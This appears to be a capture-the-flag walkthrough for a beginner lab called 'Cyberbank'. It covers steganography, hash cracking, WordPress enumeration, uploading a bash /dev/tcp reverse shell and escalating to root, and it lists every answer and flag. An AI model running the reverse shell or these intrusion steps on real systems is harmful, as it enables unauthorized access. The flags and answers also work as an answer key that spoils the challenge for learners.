CTF Solving Machine – Assessment

Title: CTF Challenge – Get the Bank Website access and then Get Root access

Perform a Pentesting on Finance Based Company known as “Cyberbank”. It is a
Beginner to Intermedia Level Room, to understand the website testing and get
system access from the Web Portal.

Short Description:
Here I develop a Machine for full website hacking to resolve the challenge to
get next hint so the student will get the Root access of the Web Server
Machine Running. Your target is to reach root access user via privileges
Escalation method.

Learning Skills:
Web security, Manual Pentesting, Burpsuite, Brute Force Attack, Hashing,
Steganography, WordPress Hacking and Linux Privilege Escalation attack.

Here we will provide one Ubuntu OS machine, we just need to import in Virtual
Box and the Lab setup is done. Now found the IP address of the virtual
machine and perform the task stats below


Tasks with Walkthrough Solution:

Task -1 Deploy the Machine
You can directly connect with TryHackMe VPN connection to perform testing
with your KALI OS / PARROT OS
You can use the ATTACK BOX on TryHackMe portal

Task-2 Information gathering and Scanning
After the machine ready
We check the Target IP address and note it.
Like in my case it was –
And the Attacker OS –

Questions -1
Which two port numbers are open on Target Machine?
Answer: 22,80

What is the txt file showing 10 disallow entries mention in the file?
Answer: robots.txt

Questions -3
What is the title of the Website you found in Aggressive Scan through NMAP?
Hint: #nmap -A -T5 -vvv 10.x.x.x

Questions -4
Can we collect any user information when we perform User Enumeration
technique on Target Machine? (Yay/Nah)
Answer: Nah

Task-3 Recon the Website
Here you have to perform recon techniques on the Website running on Port
Questions -1
Can you tell which Agency has built the Website Theme?
Answer: Themeansar

Questions -2
Can you find the Flag-0, while exploring the website?
Answer: THM{N00B_E#D_FL@G-0}

Questions -3
Can you provide what Hash value you have found while getting the Admin
Hint: Check the CB logo and decode by the “Steg hide” tool to get the HASH

Questions -4
What is the Admin Password? Here Explore the About Us Page and decode the
Image to get the Admin Password?
Answer: I_will_n3v3r_F0rg3t
Hint: Do extract the s3c***.txt file and decode with using the password list file
given in Task File
Get the password list from here: https://github.com/mukesh420/cyber_bank

Save this Image and then extract the image using the Steghide tool, but here is
some twist is there, when we extract the image, we required the password.
So do read the instruction given left side content in the About Us section.

Here is how you can assure that the Image is not a real image, as when we use
the “exif” tool utility then we can see the Information about the EXIF data is
not present it shows the Data is corrupted.
Also, here when we check the “file” tool utility then it shows the save image is
an Image.
Now you need to try to extract with Steghide, but here it asks password, so
check the source code of the Page.

So, here we don’t get confuse with the Password is “PAssWord!”
Check the sentence is return in HTML comment, so original password is
“password” only.
Use this password and extract the Image.

Here we can see the information there is some information is hidden name
We can see by use the passphrase: password

Here we got the hidden data at last
Now we need to decode it, as it seems to be base64 code value
So, we use the “base64” tool utility to decode it and we found the hash value

Now to decode we have and password file I given that we use with John tool to
extract the password

Here we have the password wordlist is provided download the file and use the
John tool to crack the SHA-256 hash is found.
Alternative, you can also try to work with Hashcat too also, if the John tool not
work properly
#hashcat -a 0 -m 1400 hash.txt pass.txt
Here we need to attached the File of password combination to crack the
admin password.

Here we working on next task so here we need to work on the new task to
fetch the FLAG 1
Task-4 Manual Exploration – Try Hard
Here we need to explore the ABOUT US now we have to proceed for Blog Post
pages, and search the new FLAG-1
Can you find the Flag, while exploring the website? {FLAG-1}
Answer: THM{P@GE_C0NT3NT_FL@G-1}
Here we found the flag in blog post, Working Together to Make Investments

Can you find the Admin Email ID?
Answer: [email protected]

Questions -3
Can you find the Flag, while exploring the website? {FLAG-2}
Answer: THM{GR@B_ADM!M_FL@G-2}

Here we got some hint about the admin user information, check the user’s
name for each blog written on the site.
Now here we get the information that the Website is build on WordPress CMS
platform, so we need to found the admin login page so, the default is /wp-
admin/ is there, but when we try it redirect to main page due to Firewall is
blocking it. Also, but in hint is given we have to found login name-based file.
So, here we can use some Directory listing tool to get the information, but it
already stats that we need to think as Manual approach instead of going
directly to automate tool. So, here we need to take word, login and check with
different webpage extension support page.
So, we got the information at “/wp-admin/login.php” location. Again, here
check the Source Code of the Page.

Can you find the Flag, while exploring the website URL directories? {FLAG-3}
Answer: THM{L0GIN_F0UND_FL@G-3}

After explore you will get the “/?author=” link whenever you see other author
information from the blog page.

Here you can check the URL, the author information is showing when you
change the number, so found the original Admin Username from this

Same when we do little research we got the login page of WordPress at
Find the Admin Username?
Answer: D0n_tCry

Task-5 Get the Root Access
Now here we found the username and password for the WordPress Admin
panel, also we
Did you upload the reverse shell in Admin Panel? (Yay/Nay)
Answer: Yay
Now little crucial part come here, we need to login and get reverse shell of the
Here we can use various Shells available, one famous you can use the Pentest
Monkey Reverse Shell.

Here, I use this Netcat Reverses shell to upload the reverse shell

exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'")


Here you can relace the IP address to your Attacker Machine IP or your Kali IP
address to get the reverse shell connections.

Now here when you upload the Shell it, in plugin section, it show some error
that the file is not uploaded or any other issue coming. So, don’t worry about
that and check the file is already uploaded in the Media Section.

Here you can see the Error Which I got while uploading process.

Here we see the file is already uploaded even the error is coming.

Now click on the file and you can see the URL that we need to execute to get
the reverse connection.

Now here you can copy the File URL Link and then open in new browser tab, to
run it.
But before running you should start the NC listener into your Attacker or Kali

Now we will run the file link on URL, and boom we got the reverse session of
the machine

Now let dig for Root Flag.

After login got, now I explore other directories and we found the /run directory
where have one secret hash and password list available.

Where you found the password list, tell the directory name?
Answer: /run

Now we copy both the file data into kali or attacker machine and then perform
the Hash cracking part to get the Password.


So, when I visit to /home directory we got the user’s name is “ineuron” is
available and checking the /etc/passwd file info it showing that ineuron user
have admin rights.
Which user password you have cracked?
Answer: ineuron


Did you reach near Root user access? (Yay/Nay)
Answer: Yay

Here we found the next Answer too.

Here we login with Ineuron user and its password we have crack it.
Now we use python code to invoke the interactive shell so root folder we can
view properly

#python3 -c ‘import os; os.system(“/bin/sh”)’

Then here we found the hIdd3n folder with one secret key
That’s out flag and its in ROT13 algorithm is used to encryption so we need to
decrypt it as show in the below image. Tada, we have Got the Last Flag also.
What algorithm the Flag is Encrypted?
Answer: ROT13

Here we got the flag:

Provide the Final Root Flag? {FLAG-4}
Answer: THM{G3T_R00T_@CC3$$_FL@G-4}
Thanks for the be patient! I hope you like the Room challenges. Thank you
Once Again to solving with me!

Open chat
Hello 👋.
Tell me, how can I help you?